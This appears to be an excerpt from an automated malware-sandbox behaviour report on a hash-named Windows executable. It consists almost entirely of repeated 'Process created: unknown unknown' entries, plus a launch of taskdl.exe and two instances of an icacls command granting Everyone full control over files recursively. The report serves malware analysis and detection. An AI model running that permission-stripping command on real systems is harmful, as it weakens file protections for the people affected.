Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
